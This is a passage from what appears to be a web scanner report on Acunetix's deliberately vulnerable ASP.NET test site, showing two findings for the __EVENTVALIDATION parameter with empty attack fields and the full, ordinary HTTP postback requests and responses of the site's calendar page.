are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1131 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,131 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8503&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgCAXAayO9sIZGRk7CIFUdilzOCuG0OBJ7Um2gmiHLk%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLm36L1DQLTp%2BrACAK1zpjCCwK%2Fk8eMBAK%2Fk8eMBAK%2Fk%2FujDQK%2Fk%2FujDQK%2Fk%2B%2FGBgK%2Fk%2B%2FGBgK%2Fk8OvAwK%2Fk8OvAwK%2Fk%2FfCDAK%2Fk%2FfCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd%2BAkCkLqd%2BAkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ%2BKYDAtfZ%2BKYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg%2BoUNAqjg%2BoUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlwckEvITpRR4%2BQM%2BK7zyQHDyF0pq1w%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:39:45 GMT Content-Length: 12481
Response Body - size: 12,481 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgCAXAayO9sIZGRk7CIFUdilzOCuG0OBJ7Um2gmiHLk=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLm36L1DQLTp+rACAK1zpjCCwK/k8eMBAK/k8eMBAK/k/ujDQK/k/ujDQK/k+/GBgK/k+/GBgK/k8OvAwK/k8OvAwK/k/fCDAK/k/fCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd+AkCkLqd+AkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ+KYDAtfZ+KYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg+oUNAqjg+oUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlwckEvITpRR4+QM+K7zyQHDyF0pq1w==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8499')" style="color:Black" title="April 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8500')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8501')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8502')" style="color:Black" title="April 12">12</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8503')" style="color:White" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8504')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8505')" style="color:Black" title="April 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8506')" style="color:Black" title="April 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8507')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8508')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8509')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8510')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8511')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8512')" style="color:Black" title="April 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8513')" style="color:Black" title="April 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8514')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8515')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8516')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8517')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8518')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8519')" style="color:Black" title="April 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1169 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,169 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8349&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgAAv4KuwtoIZGRkgtcioPyXInoNQipXw6wtCoDBl7U%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLM6ZyuDQLHkIz%2BDgL%2BkLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gIC%2B6T5jQoC%2B6T5jQoC%2B6TtoAMC%2B6TtoAMC%2B6SBxwwC%2B6SBxwwC%2B6T1rAkC%2B6T1rAkC%2B6TpwwIC%2B6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3%2BQ8C3Mu3%2BQ8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5%2BoCAtzL5%2BoCAtzL29MPAtzL29MPAtzLz%2FYIAtzLz%2FYIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm%2FBQKK%2BdPZCQKK%2BdPZCQKK%2Bcf8AgKK%2Bcf8AgKK%2BfuTCgKK%2BfuTCgKK%2Be%2B2AwKK%2Be%2B2AwKK%2BYPNDAKK%2BYPNDAKK%2BbfgBQKK%2BbfgBQKK%2BauHDQKK%2BauHDQKK%2BZ%2FsCwKK%2BZ%2FsCwKK%2BbODAwKK%2BbODA%2FXci0AFEnY8PlI72i2Bk%2BPFnM2H
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:08:44 GMT Content-Length: 12617
Response Body - size: 12,617 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABwWcu9oIHgJTRBYBBgAAv4KuwtoIZGRkgtcioPyXInoNQipXw6wtCoDBl7U=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLM6ZyuDQLHkIz+DgL+kLjwCwLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gIC+6T5jQoC+6T5jQoC+6TtoAMC+6TtoAMC+6SBxwwC+6SBxwwC+6T1rAkC+6T1rAkC+6TpwwIC+6TpwwIC3Mv76AUC3Mv76AUC3Mvvjw0C3Mvvjw0C3MuDogYC3MuDogYC3Mu3+Q8C3Mu3+Q8C3MurnAcC3MurnAcC3MvfMALcy98wAtzL89cJAtzL89cJAtzL5+oCAtzL5+oCAtzL29MPAtzL29MPAtzLz/YIAtzLz/YIArHS2Z8KArHS2Z8KArHSzbIDArHSzbIDArHS4ckMArHS4ckMArHSlewFArHSlewFArHSiYMNArHSiYMNArHSvaYGArHSvaYGArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODA/Xci0AFEnY8PlI72i2Bk+PFnM2H" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">November 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8370')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8345')" style="color:Black" title="November 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8346')" style="color:Black" title="November 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8347')" style="color:Black" title="November 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8348')" style="color:Black" title="November 09">9</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8349')" style="color:White" title="November 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8350')" style="color:Black" title="November 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8351')" style="color:Black" title="November 12">12</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8352')" style="color:Black" title="November 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8353')" style="color:Black" title="November 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8354')" style="color:Black" title="November 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8355')" style="color:Black" title="November 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8356')" style="color:Black" title="November 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8357')" style="color:Black" title="November 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8358')" style="color:Black" title="November 19">19</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8359')" style="color:Black" title="November 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8360')" style="color:Black" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8361')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8362')" style="color:Black" title="November 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8363')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8364')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8365')" style="color:Black" title="November 26">26</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting 